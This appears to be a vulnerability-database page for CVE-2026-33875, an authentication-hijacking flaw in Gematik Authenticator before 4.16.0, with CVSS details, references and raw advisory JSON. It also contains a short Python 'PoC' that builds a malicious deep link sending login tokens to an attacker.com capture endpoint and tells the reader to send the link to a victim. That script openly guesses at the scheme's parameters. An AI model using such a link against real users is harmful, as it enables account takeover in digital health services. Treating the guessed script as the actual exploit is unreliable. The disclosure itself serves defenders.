Security Vulnerability Report
中文
CVE-2026-33875 CVSS 9.3 CRITICAL

CVE-2026-33875

Published: 2026-03-27 21:17:24
Last Modified: 2026-04-03 16:16:40
Source: [email protected]

Description

Gematik Authenticator securely authenticates users for login to digital health applications. Versions prior to 4.16.0 are vulnerable to authentication flow hijacking, potentially allowing attackers to authenticate with the identities of victim users who click on a malicious deep link. Update Gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:* - VULNERABLE
Gematik Authenticator < 4.16.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-33875 # This script demonstrates how to generate a malicious deep link # that could potentially trigger the authentication hijacking. # Note: Actual exploitation depends on the specific scheme logic. import urllib.parse def generate_malicious_link(attacker_server): # Simulating the deep link scheme used by Gematik Authenticator # The vulnerable logic likely trusts the callback URL or state token base_scheme = "gematik-auth://login" # Construct parameters that might hijack the session or redirect auth code # In a real scenario, this would involve specific parameters like 'state' or 'redirect_uri' payload = { "redirect_uri": f"{attacker_server}/capture_token", "state": "hijacked_session_id", "client_id": "malicious_client" } malicious_url = f"{base_scheme}?{urllib.parse.urlencode(payload)}" return malicious_url if __name__ == "__main__": # Attacker controlled server to receive the authentication token evil_server = "https://attacker.com" link = generate_malicious_link(evil_server) print(f"[+] Malicious Deep Link Generated:\n{link}") print("[+] Send this link to the victim and wait for interaction.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33875", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:24.377", "lastModified": "2026-04-03T16:16:40.093", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gematik Authenticator securely authenticates users for login to digital health applications. Versions prior to 4.16.0 are vulnerable to authentication flow hijacking, potentially allowing attackers to authenticate with the identities of victim users who click on a malicious deep link. Update Gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-940"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.16.0", "matchCriteriaId": "B6F3F2CC-8AAB-467C-A2CB-D8D994FB4195"}]}]}], "references": [{"url": "https://github.com/gematik/app-Authenticator/security/advisories/GHSA-qg87-cf56-2rmr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.machinespirits.com/advisory/f41e56/", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.